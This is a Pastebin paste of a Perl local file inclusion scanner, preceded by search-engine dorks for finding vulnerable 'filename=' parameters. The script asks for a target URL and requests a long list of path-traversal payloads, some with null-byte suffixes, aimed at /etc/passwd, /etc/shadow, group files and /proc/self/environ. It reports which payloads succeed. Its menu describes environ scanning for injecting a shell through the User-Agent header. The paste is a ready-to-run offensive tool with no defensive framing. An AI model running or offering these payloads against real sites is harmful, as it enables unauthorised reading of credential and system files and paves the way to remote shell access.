API tools faq
paste
Advertisement
Kyfx

/etc/passwd exploit script

Kyfx
Nov 20th, 2015
1,106
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.79 KB | None | 0 0
raw download clone embed print report
  1. Dork:
  2. 2.) =autohtml.php?filename=
  3.  
  4. 1.) php?filename=aboutus.php
  5.  
  6.  
  7.  
  8. #!/usr/bin/perl
  9. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  10. #0 _ __ __ __ 1
  11. #1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  12. #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  13. #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  14. #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  15. #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  16. #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  17. #1 \ \____/ >> Exploit database separated by exploit 0
  18. #0 \/___/ type (local, remote, DoS, etc.) 1
  19. #1 1
  20. #0 [+] Site : Kalachnikov.com 0
  21. #1 [+] Support e-mail : [email protected] 1
  22. #0 0
  23. #1 ######################################### 1
  24. #0 Arsan - Kalachnikov_TN 1
  25. #1 ######################################### 0
  26. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  27.  
  28. use HTTP::Request;
  29. use LWP::UserAgent;
  30. system("title The Black Devils");
  31. system("color 1e");
  32. system ("cls");
  33. print " |=======================================================|\n";
  34. print " |= [!] Name : LFI Scanner Ver 1.0.0 Perl =|\n";
  35. print " |= [!] Author : Arsan - Kalachnikov_TN =|\n";
  36. print " |= [!] Mail: Arsan48(at)Kalachnikov(dot)com =|\n";
  37. print " |=======================================================|\n";
  38. print "\n\n";
  39. sleep (1);
  40. print "\t\t\t\t WELCOME\n";
  41. print "\n\n";
  42. menu:;
  43. print "\tMenu:\n";
  44. print "\t ID [1] => Passwd,Log";
  45. print "\t[Scan Files Of /etc/ Directory]\n";
  46. print "\t ID [2] =>Environ";
  47. print "\t[Scan Environ File For Inject Shell By U-Agent]\n";
  48. print"\n";
  49. print "\t\t Select ID For Start Scanner :";
  50. $menu = <>;
  51. if ($menu =~ /1/){
  52. goto lfi;
  53. }
  54. if ($menu =~ /2/){
  55. goto env;
  56. }
  57. else {
  58. print"\n\n";
  59. print "\t\tUnknow Command\n";
  60. goto menu;
  61. };
  62.  
  63.  
  64. lfi:;
  65. print "\n\n";
  66. print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
  67. print "\t Insert Target (ex: http://www.xxx.com/index.php?page=)\n";
  68. print "\t Target :";
  69. $host=<STDIN>;
  70. chomp($host);
  71. if($host !~ /http:\/\//) { $host = "http://$host"; };
  72.  
  73. print "\n\n";
  74. print "\t\t*-*-*-*-*-* Start Scanning /etc/ Section *-*-*-*-*-*\n";
  75. print "\n\n";
  76. @lfi = ('../etc/passwd',
  77. '../../etc/passwd',
  78. '../../../etc/passwd',
  79. '../../../../etc/passwd',
  80. '../../../../../etc/passwd',
  81. '../../../../../../etc/passwd',
  82. '../../../../../../../etc/passwd',
  83. '../../../../../../../../etc/passwd',
  84. '../../../../../../../../../etc/passwd',
  85. '../../../../../../../../../../etc/passwd',
  86. '../../../../../../../../../../../etc/passwd',
  87. '../../../../../../../../../../../../etc/passwd',
  88. '../../../../../../../../../../../../../etc/passwd',
  89. '../../../../../../../../../../../../../../etc/passwd',
  90. '../../../../../../../../../../../../../../../../etc/passwd',
  91. '....//etc/passwd',
  92. '....//....//etc/passwd',
  93. '....//....//....//etc/passwd',
  94. '....//....//....//....//etc/passwd',
  95. '....//....//....//....//....//etc/passwd',
  96. '....//....//....//....//....//....//etc/passwd',
  97. '....//....//....//....//....//....//....//etc/passwd',
  98. '....//....//....//....//....//....//....//....//etc/passwd',
  99. '....//....//....//....//....//....//....//....//....//etc/passwd',
  100. '....//....//....//....//....//....//....//....//....//....//etc/passwd',
  101. '../../etc/passwd%00',
  102. '../../../etc/passwd%00',
  103. '../../../../etc/passwd%00',
  104. '../../../../../etc/passwd%00',
  105. '../../../../../../etc/passwd%00',
  106. '../../../../../../../etc/passwd%00',
  107. '../../../../../../../../etc/passwd%00',
  108. '../../../../../../../../../etc/passwd%00',
  109. '../../../../../../../../../../etc/passwd%00',
  110. '../../../../../../../../../../../etc/passwd%00',
  111. '../../../../../../../../../../../../etc/passwd%00',
  112. '../../../../../../../../../../../../../etc/passwd%00',
  113. '../../../../../../../../../../../../../../etc/passwd%00',
  114. '../../../../../../../../../../../../../../../../etc/passwd%00',
  115. '....//etc/passwd%00',
  116. '....//....//etc/passwd%00',
  117. '....//....//....//etc/passwd%00',
  118. '....//....//....//....//etc/passwd%00',
  119. '....//....//....//....//....//etc/passwd%00',
  120. '....//....//....//....//....//....//etc/passwd%00',
  121. '....//....//....//....//....//....//....//etc/passwd%00',
  122. '....//....//....//....//....//....//....//....//etc/passwd%00',
  123. '....//....//....//....//....//....//....//....//....//etc/passwd%00',
  124. '....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
  125. '../etc/shadow',
  126. '../../etc/shadow',
  127. '../../../etc/shadow',
  128. '../../../../etc/shadow',
  129. '../../../../../etc/shadow',
  130. '../../../../../../etc/shadow',
  131. '../../../../../../../etc/shadow',
  132. '../../../../../../../../etc/shadow',
  133. '../../../../../../../../../etc/shadow',
  134. '../../../../../../../../../../etc/shadow',
  135. '../../../../../../../../../../../etc/shadow',
  136. '../../../../../../../../../../../../etc/shadow',
  137. '../../../../../../../../../../../../../etc/shadow',
  138. '../../../../../../../../../../../../../../etc/shadow',
  139. '../etc/shadow%00',
  140. '../../etc/shadow%00',
  141. '../../../etc/shadow%00',
  142. '../../../../etc/shadow%00',
  143. '../../../../../etc/shadow%00',
  144. '../../../../../../etc/shadow%00',
  145. '../../../../../../../etc/shadow%00',
  146. '../../../../../../../../etc/shadow%00',
  147. '../../../../../../../../../etc/shadow%00',
  148. '../../../../../../../../../../etc/shadow%00',
  149. '../../../../../../../../../../../etc/shadow%00',
  150. '../../../../../../../../../../../../etc/shadow%00',
  151. '../../../../../../../../../../../../../etc/shadow%00',
  152. '../../../../../../../../../../../../../../etc/shadow%00',
  153. '../etc/group',
  154. '../../etc/group',
  155. '../../../etc/group',
  156. '../../../../etc/group',
  157. '../../../../../etc/group',
  158. '../../../../../../etc/group',
  159. '../../../../../../../etc/group',
  160. '../../../../../../../../etc/group',
  161. '../../../../../../../../../etc/group',
  162. '../../../../../../../../../../etc/group',
  163. '../../../../../../../../../../../etc/group',
  164. '../../../../../../../../../../../../etc/group',
  165. '../../../../../../../../../../../../../etc/group',
  166. '../../../../../../../../../../../../../../etc/group',
  167. '../etc/group%00',
  168. '../../etc/group%00',
  169. '../../../etc/group%00',
  170. '../../../../etc/group%00',
  171. '../../../../../etc/group%00',
  172. '../../../../../../etc/group%00',
  173. '../../../../../../../etc/group%00',
  174. '../../../../../../../../etc/group%00',
  175. '../../../../../../../../../etc/group%00',
  176. '../../../../../../../../../../etc/group%00',
  177. '../../../../../../../../../../../etc/group%00',
  178. '../../../../../../../../../../../../etc/group%00',
  179. '../../../../../../../../../../../../../etc/group%00',
  180. '../../../../../../../../../../../../../../etc/group%00',
  181. '../etc/security/group',
  182. '../../etc/security/group',
  183. '../../../etc/security/group',
  184. '../../../../etc/security/group',
  185. '../../../../../etc/security/group',
  186. '../../../../../../etc/security/group',
  187. '../../../../../../../etc/security/group',
  188. '../../../../../../../../etc/security/group',
  189. '../../../../../../../../../etc/security/group',
  190. '../../../../../../../../../../etc/security/group',
  191. '../../../../../../../../../../../etc/security/group',
  192. '../etc/security/group%00',
  193. '../../etc/security/group%00',
  194. '../../../etc/security/group%00',
  195. '../../../../etc/security/group%00',
  196. '../../../../../etc/security/group%00',
  197. '../../../../../../etc/security/group%00',
  198. '../../../../../../../etc/security/group%00',
  199. '../../../../../../../../etc/security/group%00',
  200. '../../../../../../../../../etc/security/group%00',
  201. '../../../../../../../../../../etc/security/group%00',
  202. '../../../../../../../../../../../etc/security/group%00',
  203. '../etc/security/passwd',
  204. '../../etc/security/passwd',
  205. '../../../etc/security/passwd',
  206. '../../../../etc/security/passwd',
  207. '../../../../../etc/security/passwd',
  208. '../../../../../../etc/security/passwd',
  209. '../../../../../../../etc/security/passwd',
  210. '../../../../../../../../etc/security/passwd',
  211. '../../../../../../../../../etc/security/passwd',
  212. '../../../../../../../../../../etc/security/passwd',
  213. '../../../../../../../../../../../etc/security/passwd',
  214. '../../../../../../../../../../../../etc/security/passwd',
  215. '../../../../../../../../../../../../../etc/security/passwd',
  216. '../../../../../../../../../../../../../../etc/security/passwd',
  217. '../etc/security/passwd%00',
  218. '../../etc/security/passwd%00',
  219. '../../../etc/security/passwd%00',
  220. '../../../../etc/security/passwd%00',
  221. '../../../../../etc/security/passwd%00',
  222. '../../../../../../etc/security/passwd%00',
  223. '../../../../../../../etc/security/passwd%00',
  224. '../../../../../../../../etc/security/passwd%00',
  225. '../../../../../../../../../etc/security/passwd%00',
  226. '../../../../../../../../../../etc/security/passwd%00',
  227. '../../../../../../../../../../../etc/security/passwd%00',
  228. '../../../../../../../../../../../../etc/security/passwd%00',
  229. '../../../../../../../../../../../../../etc/security/passwd%00',
  230. '../../../../../../../../../../../../../../etc/security/passwd%00',
  231. '../etc/security/user',
  232. '../../etc/security/user',
  233. '../../../etc/security/user',
  234. '../../../../etc/security/user',
  235. '../../../../../etc/security/user',
  236. '../../../../../../etc/security/user',
  237. '../../../../../../../etc/security/user',
  238. '../../../../../../../../etc/security/user',
  239. '../../../../../../../../../etc/security/user',
  240. '../../../../../../../../../../etc/security/user',
  241. '../../../../../../../../../../../etc/security/user',
  242. '../../../../../../../../../../../../etc/security/user',
  243. '../../../../../../../../../../../../../etc/security/user',
  244. '../etc/security/user%00',
  245. '../../etc/security/user%00',
  246. '../../../etc/security/user%00',
  247. '../../../../etc/security/user%00',
  248. '../../../../../etc/security/user%00',
  249. '../../../../../../etc/security/user%00',
  250. '../../../../../../../etc/security/user%00',
  251. '../../../../../../../../etc/security/user%00',
  252. '../../../../../../../../../etc/security/user%00',
  253. '../../../../../../../../../../etc/security/user%00',
  254. '../../../../../../../../../../../etc/security/user%00',
  255. '../../../../../../../../../../../../etc/security/user%00',
  256. '../../../../../../../../../../../../../etc/security/user%00');
  257.  
  258.  
  259. foreach $scan(@lfi){
  260.  
  261. $url = $host.$scan;
  262. $request = HTTP::Request->new(GET=>$url);
  263. $useragent = LWP::UserAgent->new();
  264.  
  265. $response = $useragent->request($request);
  266. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
  267. else { $msg = "Not Infected";}
  268. print "$scan..........[$msg]\n";
  269. }
  270. env:;
  271. print "\n\n";
  272. print "\t\t\tWelcom To Environ Section\n\n";
  273. print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  274. print "\t Target :";
  275. $host=<STDIN>;
  276. chomp($host);
  277. if($host !~ /http:\/\//) { $host = "http://$host"; };
  278.  
  279. print "\n\n";
  280. print "\t\t*-*-*-*-*-* Start Scanning Environ *-*-*-*-*-*\n";
  281. print "\n\n";
  282.  
  283. @env = ('../proc/self/environ',
  284. '../../proc/self/environ',
  285. '../../../proc/self/environ',
  286. '../../../../proc/self/environ',
  287. '../../../../../proc/self/environ',
  288. '../../../../../../proc/self/environ',
  289. '../../../../../../../proc/self/environ',
  290. '../../../../../../../../proc/self/environ',
  291. '../../../../../../../../../proc/self/environ',
  292. '../../../../../../../../../../proc/self/environ',
  293. '../../../../../../../../../../../proc/self/environ',
  294. '../../../../../../../../../../../../proc/self/environ',
  295. '../../../../../../../../../../../../../proc/self/environ',
  296. '../../../../../../../../../../../../../../proc/self/environ',
  297. '../proc/self/environ%00',
  298. '../../proc/self/environ%00',
  299. '../../../proc/self/environ%00',
  300. '../../../../proc/self/environ%00',
  301. '../../../../../proc/self/environ%00',
  302. '../../../../../../proc/self/environ%00',
  303. '../../../../../../../proc/self/environ%00',
  304. '../../../../../../../../proc/self/environ%00',
  305. '../../../../../../../../../proc/self/environ%00',
  306. '../../../../../../../../../../proc/self/environ%00',
  307. '../../../../../../../../../../../proc/self/environ%00',
  308. '../../../../../../../../../../../../proc/self/environ%00',
  309. '../../../../../../../../../../../../../proc/self/environ%00',
  310. '../../../../../../../../../../../../../../proc/self/environ%00');
  311.  
  312. foreach $scan_env(@env){
  313.  
  314. $url = $host.$scan_env;
  315. $request = HTTP::Request->new(GET=>$url);
  316. $useragent = LWP::UserAgent->new();
  317.  
  318. $response = $useragent->request($request);
  319. if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
  320. else { $msg = "Not Infected";}
  321. print "$scan_env..........[$msg]\n";
  322. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!